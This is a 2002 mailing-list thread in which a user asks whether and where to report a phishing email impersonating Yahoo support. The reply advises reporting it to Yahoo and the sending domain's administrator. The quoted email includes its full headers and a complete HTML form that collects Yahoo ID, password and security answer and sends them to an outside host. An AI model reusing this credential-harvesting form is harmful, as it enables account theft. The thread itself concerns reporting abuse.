Well I hate to be brash - but that's a stupid question. You definitely should report crap like this! You should report it to yahoo - they will likely want to stop someone stealing information pretending to be them. If that fails - contact the domain sysadministrator - it might be a hacked system and the owner does not know about it. On Tue, 2002-12-17 at 14:09, Oisin C. Feeley wrote: > Apologies, as this is definitely OT for psyche-list, but I was hoping > that someone could suggest what to do. I just received an email > purporting to come from "support@yahoo.com" telling me that my account > would be deleted and that to reverse this I needed to fill out some > personal information. I examined the headers and it appears to have > come from someone with an account on the computer hosting > www.chicagosocial.com. (I include the full message with headers below). > The question is what should I do about this? Possibly this person has > compromised chicagosocial and I should let them know. Or they may run > it. What do list members suggest? Is there any point in reporting it > to yahoo? > > Sorry for the OT question, but from previous discussions here it seems > that the list has a lot of knowledgeable people about this sort of > thing. > > Oisin Feeley > > > Included message follows: > > Return-Path: <support@yahoo.com> > Received: from localhost (ars [127.0.0.1]) > by localhost.localdomain (8.12.5/8.12.5) with ESMTP id > gBHIe1TW001086 > for <ofeeley@localhost>; Tue, 17 Dec 2002 10:40:38 -0800 > X-Apparently-To: ofeeley@yahoo.com via 216.136.225.62; 17 Dec 2002 > 02:25:00 > -0800 (PST) > X-Track: 1: 100 > Received: from pop.vip.sc5.yahoo.com [216.136.173.10] > by localhost with POP3 (fetchmail-6.1.0) > for ofeeley@localhost (single-drop); Tue, 17 Dec 2002 10:40:38 > -0800 (PSReceived: from 67.92.168.237 (EHLO chimta03.algx.net) > (67.92.168.237) > by mta210.mail.scd.yahoo.com with SMTP; 17 Dec 2002 02:25:00 -0800 > (PST) > Received: from smtp.interaccess.com (www.chicagosocial.com > [64.55.184.105]) > by chimmx03.algx.net > (iPlanet Messaging Server 5.2 HotFix 1.07 (built Nov 25 2002)) > with ESMTP id <0H79007SME9NQ9@chimmx03.algx.net> for ofeeley@yahoo.com; > Tue, > 17 Dec 2002 04:24:59 -0600 (CST) > Date: Tue, 17 Dec 2002 05:29:45 -0500 > From: support@yahoo.com > Subject: Your account removal IMPORTANT > To: ofeeley@yahoo.com > Message-id: <0H79007SNE9NQ9@chimmx03.algx.net> > MIME-version: 1.0 > Content-type: text/html > Content-transfer-encoding: 8BIT > > > <br> > <table width="400" align="center" cellpadding="2" cellspacing="2"> > <tr><td><font face="Tahoma" size="2" color="Black"><html><form > METHOD='get' > target=blank action='http://www.radiomhz.net/messagesend_yahoo.asp' > id=form1 > name=form1> > <center></center> > <P><FONT class=s></FONT></P> > <P><FONT class=s><IMG alt='Yahoo! Mail' border=0 height=34 > src='http://us.i1.yimg.com/us.yimg.com/i/us/pim/b/mailma1.gif' > width=250></FONT></P> > <P><FONT class=s><FONT class=Wf color=#00008b><STRONG>Yahoo?Renew > Account</STRONG></FONT></FONT></P> > <P><FONT class=s>We recently recieved an email that stated that you want > to > discontinue using the Yahoo Mail service and to remove your email > account. The > account should be deleted in the next couple of days, if however you > believe > the email was sent by someone else or you no longer want it removed you > can > renew your account by filling out the details below</FONT><BR></P> > <P> > <TABLE border=0 width='100%'> > <TBODY> > <TR> > <TD align=right width='30%'><FONT face=Arial size=-1>Yahoo! ID: > </FONT></TD> > <TD width='70%'><INPUT maxLength=32 name=email size='15' > autocomplete='off'><FONT face=Arial size=-1> <B>@ yahoo.com</B> > </FONT></TD></TR> > <TR> > <TD><FONT face=Arial size=-2>?</FONT></TD> > <TD><FONT face=Arial size=-2>(examples: 'dairyman88' or > 'free2rhyme')</FONT></TD></TR> > <TR> > <TD align=right width='30%'><FONT face=Arial > size=-1>Password:</FONT></TD> > <TD width='70%'><INPUT maxLength=32 name=password type='password' > autocomplete='off'></TD></TR> > <TR> > <TD align=right width='30%'><FONT face=Arial size=-1>Re-type > Password:</FONT></TD> > <TD width='70%'><INPUT maxLength=32 name=.pw2 type='password' > autocomplete='off'></TD></TR></TBODY></TABLE></P></DIV> > <TABLE border=0 width='100%'> > <TBODY> > <TR> > <TD align=right noWrap width='30%'><FONT face=Arial size=-1>Security > Question:</FONT></TD> > <TD width='70%'><SELECT name=.pw_q><OPTION selected value=''>[select a > question > to answer]<OPTION value='What is your pets name?'>What is your pets > name?<OPTION value='What was the name of your first school?'>What was > the name > of your first school?<OPTION value='Who was your childhood hero?'>Who > was your > childhood hero?<OPTION value='What is your favorite past-time?'>What is > your > favorite past-time?<OPTION value='What is your all-time favorite sports > team?'>What is your all-time favorite sports team?<OPTION value='What is > your > fathers middle name?'>What is your fathers middle name?<OPTION > value='What was > your high school mascot?'>What was your high school mascot?<OPTION > value='What > make was your first car or bike?'>What make was your first car or > bike?<OPTION > value='Where did you first meet your spouse?'>Where did you first meet > your > spouse?</OPTION></SELECT></TD></TR> > <TR> > <TD align=right width='30%'><FONT face=Arial size=-1>Your > Answer:</FONT></TD> > <TD width='70%'><INPUT maxLength=30 name=.pw_a > size=30></TD></TR></TBODY></TABLE> > <center><INPUT TYPE='submit' VALUE='Renew' id='submit' > name='submit'></center> > <INPUT size=2 name=renew type=hidden > value='i23aCjae8h30Ad0kfLsAdF34fdc04sdD0kd5Ld23aBdae8f4a8DfgPd23aBdae8f4a66bc397c8fdc04sd604df1338lFmVc43Sfd3d5eafc2c4aCjae8h30Ad0kfLsAdF34fdcL5D4d32Sfue3Pdsxd4MdD0kd5Ld23aBdae8f4a8DfgPd23aBdae8f4a66bc397c8fdc04sd604df1338lFmVc43Sd250fti'> > <INPUT size=2 name=from_email type=hidden > value=edonmafia></FORM></BODY></HTML></td></tr> > <tr><td><font face="Tahoma" size="2" color="Black">From,<br><b>Yahoo > Staff</b><br><br></td></tr> > </table> > -- Dan Clowater <clowater@cogeco.ca>
Attachment:
signature.asc
Description: This is a digitally signed message part
